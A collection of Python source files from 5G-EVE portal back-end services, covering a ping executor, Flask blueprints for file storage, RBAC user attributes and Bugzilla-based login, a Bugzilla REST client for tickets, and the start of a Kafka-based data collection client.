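parameters_dict = {'-c': '192.168.1.100', '-f': 'm', '-i': '1', '-P': '4', '-u': ''}

args = []
for key, value in parameters_dict.items():
    args.append(key)
    if len(value) != 0:
        args.append(value)

print(['iperf', *args])
# ['iperf', '-c', '192.168.1.100', '-f', 'm', '-i', '1', '-P', '4', '-u']
```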
{
"source": "5genesis/Remote_Ping_Agent",
"score": 2
} |
#### File: Remote_Ping_Agent/pingExecutor/pingExecutor.py
```python
import os
import re
import signal
import subprocess
import pingparsing
from textwrap import dedent
from typing import List, Dict, Optional
from datetime import datetime, timedelta, timezone
from threading import Thread
from pprint import pprint
class ping:
isRunning = False
jsonResult: Dict = {}
error: List[str] = []
startTime: datetime = None
processPID: Optional[int] = None
@classmethod
def Ping(cls, address: str, interval: float, size: int, ttl: int):
params = ['-i', str(interval), '-O']
if size > 0:
params.extend(['-s', str(size)])
if ttl > 0:
params.extend(['-t', str(ttl)])
params.append(address)
return cls.execute(params, interval)
@classmethod
def Close(cls):
if not cls.isRunning or cls.processPID is None:
raise RuntimeError('ping is not running')
os.kill(cls.processPID, signal.SIGTERM)
@classmethod
def LastJsonResult(cls):
if cls.isRunning:
raise RuntimeError("ping is still running")
print(f'Last Json Result: {cls.jsonResult}')
return cls.jsonResult
@classmethod
def StartDateTime(cls):
print(f'Start Date Time: {cls.startTime}')
return cls.startTime
@classmethod
def IsRunning(cls):
print(f'Is Running: {cls.isRunning}')
return cls.isRunning
@classmethod
def execute(cls, parameters: List[str], interval: float) -> None:
if cls.isRunning:
raise RuntimeError('ping already running')
params = ['ping', *parameters]
        print(f'Final CLI parameters: {params}')
Thread(target=cls.async_task, args=(params, interval)).start()
return None
@classmethod
def stdout(cls, process: subprocess.Popen, interval: float):
pipe = process.stdout
pingResult = []
lostPings = []
for line in iter(pipe.readline, b''):
try:
line = line.decode('utf-8').rstrip()
except Exception as e:
line = f'DECODING EXCEPTION: {e}'
print(line)
if 'error' in line or 'failed' in line:
cls.error.append(line)
result = re.search(r'no answer yet for icmp_seq=(\d+)', line)
if result:
lost_seq = int(result.group(1))
lostPings.append(lost_seq)
if line != '':
pingResult.append(line)
parser = pingparsing.PingParsing()
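        # Append a dummy statistics footer so that pingparsing accepts the collected
        # output even when ping was terminated before printing its own summary; only
        # the per-reply entries (icmp_replies) are used below.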
pingResult.extend([
"--- demo.com ping statistics ---",
"0 packets transmitted, 0 received, 0% packet loss, time 0ms",
"rtt min/avg/max/mdev = 0.0/0.0/0.0/0.0 ms",
])
stats = parser.parse(dedent("\n".join(pingResult)))
icmp_replies = stats.icmp_replies
for lost in lostPings:
icmp_replies.insert(lost-1, {'timestamp': None, 'icmp_seq': lost, 'ttl': 54, 'time': -1.0,
'duplicate': False})
for icmp in icmp_replies:
date = cls.startTime + timedelta(seconds=(icmp['icmp_seq']*interval))
icmp['timestamp'] = date.timestamp()
cls.jsonResult = {'total': len(icmp_replies), 'success': len(icmp_replies)-len(lostPings),
'icmp_replies': icmp_replies}
print("Final JSON results")
pprint(cls.jsonResult)
@classmethod
def async_task(cls, params: List[str], interval: float):
cls.isRunning = True
cls.error = []
cls.jsonResult = {}
cls.startTime = datetime.now(timezone.utc)
try:
process = subprocess.Popen(params, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
cls.processPID = process.pid
print('ping running')
cls.stdout(process, interval)
process.wait()
except Exception as e:
print(f'Error in process: {e}')
finally:
cls.isRunning = False
cls.processPID = None
print('ping finished')
``` |
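A standalone illustration of the lost-ping handling above: the regex detects unanswered probes in ping's `-O` output, and each entry is later timestamped as the start time plus the sequence number times the probing interval.
```python
import re
from datetime import datetime, timedelta, timezone

start_time = datetime.now(timezone.utc)
interval = 1.0
line = 'no answer yet for icmp_seq=7'

match = re.search(r'no answer yet for icmp_seq=(\d+)', line)
if match:
    seq = int(match.group(1))
    timestamp = (start_time + timedelta(seconds=seq * interval)).timestamp()
    print(f'probe {seq} lost, reconstructed timestamp {timestamp}')
```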
{
"source": "5GEVE/5G-EVE-PORTAL-BACKEND-fs",
"score": 2
} |
#### File: blueprints/files_storage/fs_bp.py
```python
from flask import ( Blueprint, jsonify, request)
from flask import current_app, send_from_directory
import os, app, requests, json, sys
from app import db
from werkzeug.utils import secure_filename
from app.keycloak.decorators import token_required
from app.keycloak.keycloak_client import KeycloakClient
from app.files_manager.files_manager import *
from app.models.file_data import *
from app.models.file_to_site import *
from app.models.site_data import *
# BLUEPRINT CREATION
bp = Blueprint('auth', __name__, url_prefix='/portal/fs')
kc_client = KeycloakClient()
fs_manager = FilesManager()
# ROUTES DEFINITION
@bp.route('/', methods=['GET'])
@token_required
def get_files(token_data):
if "SiteManager" in token_data['roles']:
data, status = fs_manager.get_files_to_deploy(token_data)
return data, status
elif "VnfDeveloper" in token_data['roles']:
data, status = fs_manager.get_uploaded_files(token_data)
return data, status
else:
return jsonify({"details": "Unauthorized"}), 401
'''
Saves single file uploaded from request.form
- uses stream to read in by chunks
@url_params:
- filename: name of the file
@form_params:
- file: file to be uploaded
@NOTE: When using direct access to flask.request.stream you cannot access request.file or request.form first,
otherwise the stream is already parsed and empty (internal behaviour of werkzeug)
'''
@bp.route('/upload/<filename>', methods=['POST'])
@token_required
def upload(token_data, filename=None):
if "VnfDeveloper" in token_data['roles']:
if "Content-Length" not in request.headers:
return jsonify({"details":"Content-Length not in headers"}), 400
if filename is None or filename == '':
return jsonify({"details":"Filename not provided"}), 400
data, status = fs_manager.upload_file(token_data, filename, request)
return data, status
else:
return jsonify({"details": "Unauthorized"}), 401
'''
Assignment of sites for a specific file
@url_params:
- filename: name of the file
@json_params:
- sites: sites where the specified file must be deployed
'''
@bp.route('/sites/<filename>', methods=['POST'])
@token_required
def set_sites(token_data, filename=None):
if "VnfDeveloper" in token_data['roles']:
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
try:
data = request.get_json()
except Exception as e:
return jsonify({"details": "Provided JSON not correctly formatted"}), 400
if "sites" not in data.keys():
return jsonify({"details":"No sites provided"}), 400
# Retrieve list of site managers for the specific sites
site_managers, status_code = kc_client.get_site_manager_users()
if status_code == requests.codes.ok:
sm_map = {}
for site in data['sites']:
sm_map[site] = []
for sm in site_managers:
if "attributes" in sm.keys():
if "managed_sites" in sm['attributes'].keys():
if site in sm['attributes']['managed_sites']:
sm_map[site].append(sm['email'])
# Store information about the site where the uploaded file must be deployed
data, status = fs_manager.set_uploaded_file_sites(token_data, filename, data['sites'], sm_map, request)
return data, status
else:
print('Error retrieving list of site managers', file=sys.stderr)
return jsonify({"details": site_managers}), status_code
else:
return jsonify({"details": "Unauthorized"}), 401
'''
Updates the status of an uploaded file
@url_params:
- filename: name of the file
@json_params:
- status: new status to be assigned
- site: site name at which the file will be deployed
'''
@bp.route('/status/<filename>', methods=['POST'])
@token_required
def set_file_status(token_data, filename=None):
if not "SiteManager" in token_data['roles']:
return jsonify({"details": "Unauthorized"}), 401
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
try:
data = request.get_json()
except Exception as e:
return jsonify({"details": "Provided JSON not correctly formatted"}), 400
if "status" not in data.keys() or "site" not in data.keys():
return jsonify({"details":"No sites provided"}), 400
if data['status'] not in ['PENDING', 'READY']:
return jsonify({"details":"Status not supported. Only PENDING or READY can be used."}), 400
data, status = fs_manager.set_file_status(token_data, filename, data['site'], data['status'])
return data, status
'''
Downloads a specific file
@url_params:
- filename: name of the file
'''
@bp.route('/download/<filename>', methods=['GET'])
@token_required
def download(token_data, filename=None):
if filename is None or filename=='':
return jsonify({"details":"Filename not provided"}), 400
if "SiteManager" in token_data['roles']:
file_to_download = FileData.query.filter_by(filename=filename).first()
user_folder_name = "{}/".format(str(file_to_download.creator).split('@')[0])
elif "VnfDeveloper" in token_data['roles']:
user_folder_name = "{}/".format(str(token_data['email']).split('@')[0])
else:
return jsonify({"details": "Unauthorized"}), 401
folder_path = os.path.join(os.path.join(current_app.config['UPLOAD_FOLDER'], user_folder_name))
file_full_path = os.path.join(os.path.join(folder_path, filename))
if not os.path.exists(file_full_path):
return jsonify({"details":"File does not exist"}), 400
return send_from_directory(folder_path, filename)
'''
Method to remove a file. Only the owner of the file will completely remove the file
from the system.
@url_params:
- filename: name of the file
@json_params:
- site: site name at which the file will be deployed
'''
@bp.route('/delete/<filename>', methods=['POST'])
@token_required
def delete(token_data, filename=None):
if filename is None or filename=='':
return jsonify({"details":"Filename not provided"}), 400
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
try:
data = request.get_json()
except Exception as e:
return jsonify({"details": "Provided JSON not correctly formatted"}), 400
if "site" not in data.keys():
return jsonify({"details":"No site provided"}), 400
if "SiteManager" in token_data['roles']:
file_to_download = FileData.query.filter_by(filename=filename).first()
user_folder_name = "{}/".format(str(file_to_download.creator).split('@')[0])
elif "VnfDeveloper" in token_data['roles']:
user_folder_name = "{}/".format(str(token_data['email']).split('@')[0])
else:
return jsonify({"details": "Unauthorized"}), 401
folder_path = os.path.join(os.path.join(current_app.config['UPLOAD_FOLDER'], user_folder_name))
file_full_path = os.path.join(os.path.join(folder_path, filename))
if not os.path.exists(file_full_path):
return jsonify({"details":"File does not exist"}), 400
fs_manager.delete_file(file_full_path, filename, data['site'])
return jsonify({"details": "file {} correctly removed".format(filename)}), 200
'''
Retrieves all the available site facilities where VNFs can be deployed
'''
@bp.route('/site-facilities', methods=['GET'])
@token_required
def get_site_facilities(token_data):
site_facilities = SiteData.query.all()
site_facilities_names = []
for site in site_facilities:
site_facilities_names.append(site.sitename)
return jsonify({"details": { "site_facilities": site_facilities_names}}), 200
``` |
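A hypothetical client-side call to the upload route above (blueprint prefix `/portal/fs`). The host and token are placeholders, and this assumes that `token_required` reads a Keycloak bearer token from the `Authorization` header; `requests` derives the required `Content-Length` from the file object.
```python
import requests

host = 'https://portal.example.com'   # placeholder
token = 'eyJhbGciOi...'               # placeholder access token of a VnfDeveloper user

with open('my_vnf_package.tar.gz', 'rb') as payload:
    r = requests.post(f'{host}/portal/fs/upload/my_vnf_package.tar.gz',
                      headers={'Authorization': f'Bearer {token}'},
                      data=payload)
print(r.status_code, r.json())
```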
{
"source": "5GEVE/5G-EVE-PORTAL-BACKEND-rbac",
"score": 2
} |
#### File: blueprints/extra/extra_bp.py
```python
from flask import ( Blueprint, jsonify, request )
from app import oidc, config
#from flask_jwt_extended import ( jwt_optional, get_jwt_identity )
from app.keycloak.keycloak_client import Keycloak
import requests, json, collections
from requests.auth import HTTPBasicAuth
# BLUEPRINT CREATION
bp = Blueprint('extra', __name__, url_prefix='/portal/rbac/extra')
# Keycloak adapter
kc_client = Keycloak()
# Bugzilla URL
BZ_URL = config['bz_url']
# ROUTES DEFINITION
"""
Retrieves available roles
"""
@bp.route('/realmroles', methods=['GET'])
def get_realm_roles():
status_code, msg = kc_client.get_available_roles()
return jsonify({"details": msg}), status_code
##########################
## Use cases management ##
##########################
@bp.route('/use-cases', methods=['GET'])
@oidc.accept_token(require_token=True)
def get_use_cases():
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
status_code, msg = kc_client.get_user_attributes(msg['id'], "use_cases")
return jsonify({"details": msg}), status_code
@bp.route('/use-cases', methods=['POST'])
@oidc.accept_token(require_token=True)
def add_use_cases():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
try:
if not data['use_cases']:
return jsonify({"details": "No use cases provided"}), 400
except Exception as e:
return jsonify({"details": "use_cases key not found at the provided JSON"}), 400
if not type(data['use_cases']) == list:
return jsonify({"details": "Use cases must be provided using a list of elements"}), 400
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
status_code, msg = kc_client.add_user_attributes(msg['id'], "use_cases", data['use_cases'])
return jsonify({"details": msg}), status_code
@bp.route('/use-cases', methods=['DELETE'])
@oidc.accept_token(require_token=True)
def delete_use_cases():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
if not data['use_cases']:
return jsonify({"details": "No use cases provided"}), 400
if not type(data['use_cases']) == list:
return jsonify({"details": "Use cases must be provided using a list of elements"}), 400
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
status_code, msg = kc_client.delete_user_attributes(msg['id'], "use_cases", data['use_cases'])
return jsonify({"details": msg}), status_code
###################
## Managed sites ##
###################
@bp.route('/managed-sites', methods=['GET'])
@oidc.accept_token(require_token=True)
def get_managed_sites():
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
if "SiteManager" in msg['roles']:
status_code, msg = kc_client.get_user_attributes(msg['id'], "managed_sites")
else:
msg = {"managed_sites": []}
status_code = 200
return jsonify({"details": msg}), status_code
@bp.route('/managed-sites', methods=['POST'])
@oidc.accept_token(require_token=True)
def add_managed_sites():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
try:
if not data['managed_sites']:
return jsonify({"details": "No use cases provided"}), 400
except Exception as e:
return jsonify({"details": "managed_sites key not found at the provided JSON"}), 400
if not type(data['managed_sites']) == list:
return jsonify({"details": "Use cases must be provided using a list of elements"}), 400
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
if "SiteManager" in msg['roles']:
status_code, msg = kc_client.add_user_attributes(msg['id'], "managed_sites", data['managed_sites'])
else:
msg = {"managed_sites": []}
status_code = 200
return jsonify({"details": msg}), status_code
@bp.route('/managed-sites', methods=['DELETE'])
@oidc.accept_token(require_token=True)
def delete_managed_sites():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
    if 'managed_sites' not in data.keys():
        return jsonify({"details": "No managed sites provided"}), 400
if not type(data['managed_sites']) == list:
return jsonify({"details": "Use cases must be provided using a list of elements"}), 400
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
if "SiteManager" in msg['roles']:
status_code, msg = kc_client.delete_user_attributes(msg['id'], "managed_sites", data['managed_sites'])
else:
msg = {"managed_sites": []}
status_code = 200
return jsonify({"details": msg}), status_code
#### For testing purposes ####
@bp.route('/services', methods=['GET'])
@oidc.accept_token(require_token=True)
def services():
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
if "5geve_admin" in msg['roles']:
services = [{'name':'Experiments'}, {'name': 'VNF Storage'}, {'name': 'Services Catalogue'}, {'name': 'Tickets'}]
elif "5geve_experimenter" in msg['roles']:
services = [{'name':'Experiments'}, {'name': 'Services Catalogue'}, {'name': 'Tickets'}]
elif "5geve_vnfdev" in msg['roles']:
services = [{'name': 'VNF Storage'}, {'name': 'Tickets'}]
else:
services = [{}]
return jsonify({'details': services}), status_code
return msg, status_code
``` |
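A hypothetical call to the use-cases endpoint above (prefix `/portal/rbac/extra`). Host and token are placeholders; the blueprint extracts the bearer token from the `Authorization` header.
```python
import requests

host = 'https://portal.example.com'   # placeholder
token = 'eyJhbGciOi...'               # placeholder Keycloak access token

r = requests.post(f'{host}/portal/rbac/extra/use-cases',
                  headers={'Authorization': f'Bearer {token}'},
                  json={'use_cases': ['smart-city-monitoring', 'media-streaming']})
print(r.status_code, r.json())
```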
{
"source": "5GEVE/5G-EVE-PORTAL-BACKEND-tsb",
"score": 2
} |
#### File: blueprints/auth/auth_bp.py
```python
from flask import ( Blueprint, jsonify, request )
from app import db, bcrypt, bz_client, kc_client
import requests
from app.models.user import *
from app.keycloak.keycloak_client import Keycloak
from app.bugzilla.bugzilla_client import BugzillaClient
# BLUEPRINT CREATION
bp = Blueprint('auth', __name__, url_prefix='')
# ROUTES DEFINITION
@bp.route('/register', methods=['POST'])
def registration():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
try:
data = request.get_json()
except Exception as e:
return jsonify({"details": "Json not correctly formatted"}), 400
schema = BugzillaUserSchema()
errors = schema.validate(data)
if errors:
return jsonify({"details": errors}), 400
# check uniqueness of the username and email in local database
if not BugzillaUser.query.filter_by(email=data['email']).first() == None:
return jsonify({"details": "Username already registered"}), 400
# Create user in bugzilla
status, msg = bz_client.create_user(data)
if status in [200, 201]:
# Hash password
data['password'] = bcrypt.generate_password_hash(data['password'].encode('utf-8'))
# Store new user in local database
new_user = schema.load(data)
db.session.add(new_user)
db.session.commit()
return jsonify({'details': msg}), status
@bp.route('/login', methods=['POST'])
def login():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
if 'email' not in data.keys() or 'password' not in data.keys():
return jsonify({"details": "Email or password not provided"}), 400
status, msg = bz_client.login(data)
if status == requests.codes.ok:
user = BugzillaUser.query.filter_by(email=data['email']).first()
if user:
#TODO: Request user details and store bugzilla user id
#token_to_user_status, token_to_user_msg = kc_client.token_to_user(msg['token'])
#if token_to_user_status == requests.codes.ok:
#user.bz_user_id = token_to_user_msg['id']
user.apikey = msg['token']
db.session.commit()
return jsonify({"details": "User correctly logged in", "token": msg['token']}), 200
else:
schema = BugzillaUserSchema()
data['password'] = <PASSWORD>.generate_password_hash(data['password'].encode('utf-8'))
data['apikey'] = msg['token']
data['full_name'] = data['email']
# Store user in local database
new_user = schema.load(data)
db.session.add(new_user)
db.session.commit()
return jsonify({"details": "User correctly logged in", "token": msg['token']}), 200
print("[AUTH_BP][ERROR] > User correctly logged in at bugzilla but not found at local database")
return jsonify({"details": "Internal server error"}), 500
return jsonify({"details": msg}), status
@bp.route('/logout', methods=['GET'])
def logout():
token = str(request.headers['authorization']).split(" ")[1]
user_email = kc_client.get_user_email(token)
user = BugzillaUser.query.filter_by(email=user_email).first()
if user:
status, msg = bz_client.logout(user.apikey)
if status == requests.codes.ok:
user.apikey = ""
db.session.commit()
return jsonify({"details": "User session corretly closed"}), 200
return jsonify({"details": msg}), status
else:
print("[AUTH_BP][ERROR] > User correctly logged in at keycloak but not found at local database")
return jsonify({"details": "Internal server error"}), 500
'''
@bp.route('/changepassword', methods=['PUT'])
def change_password():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
try:
user_email = data['user_email']
new_password = data['<PASSWORD>']
except KeyError as error:
return jsonify({"details": "Parameter {} not provided".format(error)}), 400
status, msg = bz_client.change_password(user_email, new_password)
user = BugzillaUser.query.filter_by(email=user_email).first()
if user:
if status == requests.codes.ok:
user.password = <PASSWORD>(<PASSWORD>)
db.session.commit()
return jsonify({"details": "Password correctly updated"}), status
else:
return jsonify({"details": msg}), status
else:
data = {"email":user_email, "password": <PASSWORD>}
login_status, login_msg = bz_client.login(data)
if status == requests.codes.ok:
schema = BugzillaUserSchema()
data['password'] = <PASSWORD>(<PASSWORD>)
data['apikey'] = login_msg['token']
data['full_name'] = data['email']
# Store user in local database
new_user = schema.load(data)
db.session.add(new_user)
db.session.commit()
return jsonify({"details": ""}), 204
else:
print("[AUTH_BP][ERROR] > User correctly logged in at keycloak but not found at local database")
return jsonify({"details": "Internal server error"}), 500
'''
```
#### File: app/bugzilla/bugzilla_bugs.py
```python
import requests, json
from datetime import datetime
import numpy as np
class BugzillaBug:
def __init__(self, bugzilla_data):
self.bugzilla_data = bugzilla_data
""" Method to get a specific bug. The requested bug is only provided if:
    - requester has admin role, we will reply with all the tickets
- requester is not admin but is requesting 5G-EVE_PORTAL tickets (which are public)
@params:
- requester: email address of the user who is requesting data
- bug_id: bug identifier
@return:
- HTTP code: 200, 401 UNAUTHORIZED
- message: it will include a bug or details about the error
"""
def get_bugs_by_id(self, requester, requester_token, bug_id, is_admin):
if is_admin:
url = self.bugzilla_data['bugs_uri'] + '/' + bug_id + "?api_key=" + self.bugzilla_data['admin_key']
else:
url = self.bugzilla_data['bugs_uri'] + '/' + bug_id + "?token=" + requester_token
response = requests.get(url)
if response.status_code == requests.codes.ok:
data = response.json()
if is_admin:
return response.status_code, data
if len(data['bugs']) > 0:
if data['bugs'][0]['product'] == "5G-EVE_PORTAL":
return response.status_code, data
else:
return requests.codes.unauthorized, json.loads('{"details": "User unauthorized for retrieving ticket"}')
else:
                return response.status_code, json.loads(json.dumps([]))
return response.status_code, response.json()
""" Method to collect bugs from bugzilla (all for admin and 5G-EVE_PORTAL related for regular users)
@params:
- requester: email address of the user requesting bugs
@return:
- HTTP code
- message: it will include a bug list or details about the error
"""
def get_bugs_by_creator(self, requester, requester_token, is_admin, page):
        if page is None:
            page = 1
        page = int(page)
if is_admin:
url = self.bugzilla_data['bugs_uri'] + "?api_key=" + self.bugzilla_data['admin_key'] + "&status=CONFIRMED"
else:
#url = self.bugzilla_data['bugs_uri'] + "?reporter=" + requester + "&token=" + requester_token + "&status=CONFIRMED"
url = self.bugzilla_data['bugs_uri'] + "?api_key=" + self.bugzilla_data['admin_key'] + "&status=CONFIRMED&product=5G-EVE_PORTAL"
response = requests.get(url)
if response.status_code == 200:
sorted_bugs = sorted(response.json()['bugs'], key=lambda k: datetime.strptime(k['creation_time'],'%Y-%m-%dT%H:%M:%SZ'), reverse=True)
if not is_admin:
non_admin_bugs = []
for b in sorted_bugs:
if b['component'] == "VNF_UPLOADS" and b['creator_detail']['email'] == requester:
non_admin_bugs.append(b)
elif b['component'] not in ["REGISTRATION", "VNF_UPLOADS", "AUTHENTICATION"]:
non_admin_bugs.append(b)
sorted_bugs = non_admin_bugs
            if page > np.ceil(len(sorted_bugs) / 10):
                return 404, "Tickets page not found"
            bugs = []
            # page is 1-based, so page 1 maps to list indices 0..9
            start = (page - 1) * 10
            end = start + 10
if end > len(sorted_bugs):
end = len(sorted_bugs)
for i in range(start, end):
bugs.append(sorted_bugs[i])
data = {}
data['tickets'] = bugs
data['totalTickets'] = len(sorted_bugs)
data['numTickets'] = len(bugs)
return response.status_code, data
return response.status_code, response.content
""" Method to create a bug
@params:
- reporter_token: user token
- bug_data: data provided to create a bug
- product: Name of the product where the bug is being created
- component: Name of the component inside the product where the bug is being created
- version: unspecified by default
- summary: summary of the bug
- description: description
- assigned_to: by default it will be the component owner
- reporter: email of the admin reporter in case it is a ticket creation from a trusted service
"""
def create_bug(self, reporter_token, bug_data, reporter):
if reporter_token != None:
url = self.bugzilla_data['bugs_uri'] + "?token=" + reporter_token
elif reporter_token == None and reporter != None and reporter == self.bugzilla_data['username']:
url = self.bugzilla_data['bugs_uri'] + "?api_key=" + self.bugzilla_data['admin_key']
#TODO: hardcoded values not defaulted at bugzilla
bug_data['version'] = "unspecified"
bug_data['op_sys'] = "other"
bug_data['platform'] = "pc"
response = requests.post(url, data=bug_data)
return response.status_code, response.json()
""" Method to update a specific bug
@params:
- reporter_token
- bug_data
- summary: new summary of the bug
- description: new description of the bug
- groups: group names to be added/removed
> "groups": {"add/remove": ["group1", "group2"]}
- assigned_to: email of the user to assign the bug
- status: new status of the bug. When changing to closed, resolution should be provided
- bug_id
- is_admin
@return:
status: HTTP code
msg: information returned from bugzilla REST API
"""
def update_bug(self, reporter, reporter_token, bug_data, bug_id, is_admin):
if is_admin:
url = self.bugzilla_data['bugs_uri'] + "/" + bug_id + "?token=" + reporter_token
response = requests.put(url, data=bug_data)
else:
code, msg = self.get_bugs_by_id(requester=reporter, requester_token=reporter_token, bug_id=bug_id, is_admin=False)
if code == requests.codes.ok:
url = self.bugzilla_data['bugs_uri'] + "/" + bug_id + "?token=" + reporter_token
response = requests.put(url, data=bug_data)
else:
return 401, json.loads(json.dumps({"error": "User not allowed to update bug #{}".format(bug_id)}))
return response.status_code, response.json()
```
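A standalone illustration of the ten-ticket pagination window used in `get_bugs_by_creator()`, assuming the 1-based page handling above:
```python
sorted_bugs = list(range(57))      # stand-in for 57 tickets already sorted by creation time
page = 2

start = (page - 1) * 10
end = min(start + 10, len(sorted_bugs))
print(sorted_bugs[start:end])      # indices 10..19, i.e. the second page of ten tickets
```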
#### File: app/bugzilla/bugzilla_client.py
```python
import requests, os, json, functools
from flask import jsonify
from .bugzilla_products import BugzillaProducts
from .bugzilla_components import BugzillaComponent
from .bugzilla_bugs import BugzillaBug
from .bugzilla_comments import BugzillaComment
class BugzillaClient:
def __init__(self):
with open(os.path.abspath(os.path.dirname(__file__))+'/bugzilla_data.json') as config:
self.bugzilla_data = json.load(config)
self.products = BugzillaProducts(self.bugzilla_data)
self.components = BugzillaComponent(self.bugzilla_data)
self.bugs = BugzillaBug(self.bugzilla_data)
self.bug_comments = BugzillaComment(self.bugzilla_data)
def trusted_requester(self, requester):
if requester == self.bugzilla_data['username']:
return True
else:
return False
""" Method to create new users at bugzilla
@params:
- email
- full_name
- password
@return: HTTP code + details message
"""
def create_user(self, user_data):
url = self.bugzilla_data['users_uri'] + "?api_key=" + self.bugzilla_data['admin_key']
response = requests.post(url, data=user_data)
return response.status_code, response.json()
""" Login method
@params: email + password
@return:
- HTTP code
- Details message: if success, it will include an access token that belongs to the authenticated user
"""
def login(self, user_data):
#url = self.bugzilla_data['login_uri'] + "?login=" + user_data['email'] + '&password="{}"'.format(user_data['password'])
url = self.bugzilla_data['login_uri']
params = {'login': user_data['email'], 'password': user_data['password']}
response = requests.get(url, params=params)
if response.status_code != 200:
return response.status_code, "User not found"
return response.status_code, response.json()
""" Logout method
@params: user session token
@return: HTTP code + details message
"""
def logout(self, token):
        url = self.bugzilla_data['logout_uri'] + "?token=" + token
response = requests.get(url)
return response.status_code, response.json()
def get_admin_users(self):
url = self.bugzilla_data['users_uri'] + "?api_key=" + self.bugzilla_data['admin_key'] + '&match=*@*'
response = requests.get(url)
if response.status_code != requests.codes.ok:
return response.status_code, response.json()
else:
data = response.json()
admin_users = []
for user in data['users']:
for group in user['groups']:
if group['name'] == 'admin':
admin_users.append(user['email'])
break
return response.status_code, json.loads(json.dumps({'users': admin_users}))
def change_password(self, user_email, new_password):
url = self.bugzilla_data['users_uri'] + "/"+ user_email + "?api_key=" + self.bugzilla_data['admin_key']
new_user_data = {
"password": <PASSWORD>
}
response = requests.put(url, data=new_user_data)
return response.status_code, response.json()
#### PRODUCTS MANAGEMENT ####
def get_products(self):
return self.products.get_products()
#### COMPONENTS MANAGEMENT ####
def get_components(self, product_id, detailed):
if detailed:
return self.components.get_components_all_details(product_id)
else:
return self.components.get_components(product_id)
#### BUGS MANAGEMENT ####
def get_bug(self, requester_email, requester_token, bug_id, is_admin):
return self.bugs.get_bugs_by_id(requester_email, requester_token, bug_id, is_admin)
def get_bugs(self, requester_email, requester_token, is_admin, page):
return self.bugs.get_bugs_by_creator(requester_email, requester_token, is_admin, page)
def create_bug(self, reporter_token, bug_data, reporter):
return self.bugs.create_bug(reporter_token, bug_data, reporter)
def update_bug(self, reporter_email, reporter_token, bug_data, bug_id, is_admin):
return self.bugs.update_bug(reporter_email, reporter_token, bug_data, bug_id, is_admin)
def get_bug_comments(self, requester_token, bug_id, is_admin):
return self.bug_comments.get_comments(requester_token, bug_id, is_admin)
def create_bug_comment(self, user_token, bug_id, comment_data, is_admin):
return self.bug_comments.create_comment(user_token, bug_id, comment_data, is_admin)
```
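The client reads its configuration from `bugzilla_data.json` next to this module. The sketch below lists only the fields that the code above accesses; all values are placeholders and the real file may contain more keys.
```python
# Illustrative content of bugzilla_data.json (placeholders only)
bugzilla_data = {
    "username": "portal-admin@example.com",
    "admin_key": "REPLACE_WITH_ADMIN_API_KEY",
    "users_uri": "https://bugzilla.example.com/rest/user",
    "login_uri": "https://bugzilla.example.com/rest/login",
    "logout_uri": "https://bugzilla.example.com/rest/logout",
    "products_uri": "https://bugzilla.example.com/rest/product",
    "bugs_uri": "https://bugzilla.example.com/rest/bug",
}
```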
#### File: app/bugzilla/bugzilla_components.py
```python
import requests, json
class BugzillaComponent:
def __init__(self, bugzilla_data):
self.bugzilla_data = bugzilla_data
""" Retrieve all components of a product
@params:
- product_id: product identifier
"""
def get_components(self, product_id):
# Get product who stores the components
response = requests.get(self.bugzilla_data['products_uri'] + '/' + str(product_id))
if response.status_code == requests.codes.ok:
data = response.json()
if len(data['products']) > 0:
components = []
for component in data['products'][0]['components']:
if component['name'] not in ["REGISTRATION", "AUTHENTICATION"]:
component = {'id': component['id'], 'name': component['name'], 'description': component['description']}
components.append(component)
return response.status_code, json.loads(json.dumps(components))
else:
return response.status_code, json.loads(json.dumps([]))
return response.status_code, response.json()
""" Retrieve all components of a product
@params:
- product_id: product identifier
"""
def get_components_all_details(self, product_id):
# Get product who stores the components
response = requests.get(self.bugzilla_data['products_uri'] + '/' + str(product_id))
if response.status_code == requests.codes.ok:
data = response.json()
if len(data['products']) > 0:
print(data)
return response.status_code, data['products'][0]['components']
else:
return response.status_code, json.loads(json.dumps([]))
return response.status_code, response.json()
```
#### File: app/tests/test_flaskr.py
```python
import os
import tempfile
import requests
api_url = "http://127.0.0.1:8989"
def test_no_token():
"""Request home without token"""
response = requests.get(api_url+"/isvalid")
print(response.status_code)
assert response.status_code == 401
``` |
{
"source": "5GEVE/5geve-wp3-dcm-handler",
"score": 2
} |
#### File: 5GEVE/5geve-wp3-dcm-handler/dcm_rest_client.py
```python
import requests
import argparse
import logging
import coloredlogs
from flask import Flask, request, jsonify
from flask_swagger import swagger
from waitress import serve
import subprocess
from kafka import KafkaProducer
from kafka.errors import KafkaError
from kafka.future import log
import json
app = Flask(__name__)
logger = logging.getLogger("DCMRestClient")
kafka_port = "9092"
signalling_metric_infrastructure = "signalling.metric.infrastructure"
signalling_metric_application = "signalling.metric.application"
signalling_kpi = "signalling.kpi"
"""
The creation of MirrorMaker processes has been moved to dedicated systemd services.
This allows to check logs more easily, setup restart on failure.
We leave this code for future reference.
"""
# Start one MirrorMaker per each site, blacklisting signalling and)
# def start_mirror(site):
# """
# Opens a mirrormaker with a site in order to mirror metric topics.
# Signalling and KPI topics are blacklisted with regex.
# """
# print("Start MirrorMaker for " + site);
